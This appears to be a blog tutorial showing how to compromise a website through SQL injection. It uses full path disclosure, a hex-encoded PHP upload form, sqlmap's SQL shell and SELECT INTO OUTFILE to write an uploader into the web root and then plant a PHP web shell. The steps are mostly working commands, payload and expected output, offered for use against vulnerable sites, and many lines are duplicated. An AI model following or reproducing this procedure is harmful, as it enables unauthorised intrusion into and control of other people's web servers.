Upload shell with SQL injection
1. After finding a vulnerable site you need to get full path disclosure.
I will use the empty array exploit, add the brackets []
http://www.example.com/index.php?id[]=1
Gives something like
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59
Now we have the path.
I will use the empty array exploit, add the brackets []
http://www.example.com/index.php?id[]=1
Gives something like
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59
Now we have the path.
2. You need to convert your upload script to hex
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>
Becomes
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
3. Now lets fire up sqlmap with a sql-shell and inject
python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shell
Let sqlmap do its magic and after a while you will get a sql-shell
Gives something like
python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shell
Let sqlmap do its magic and after a while you will get a sql-shell
Gives something like
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
Now write
SELECT 0xYour_Hex_Code INTO OUTFILE "Full_Path+filename";
Don't forget the 0x before your hex, so it soul look like
Don't forget the 0x before your hex, so it soul look like
SELECT 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
INTO OUTFILE "/home/relax/public_html/upload.php";
INTO OUTFILE "/home/relax/public_html/upload.php";
After a few seconds you should get a confirmation if it was successful or not
4. Browse to http://www.example.com/upload.php and upload the php shell
5. Browse to your php shell
==> Extra:
-- You don't need to use sqlmap you can simply run the select statement in your browser, It requires a bit more work though.
-- You can inject the full shellcode directly instead of first writing the uploader, the problems is that most shells have big size but maybe with a smaller shell
-- You don't need to use sqlmap you can simply run the select statement in your browser, It requires a bit more work though.
-- You can inject the full shellcode directly instead of first writing the uploader, the problems is that most shells have big size but maybe with a smaller shell
Noteworthy site, Distinguished criticism that I can handle.
ReplyDeleteowasp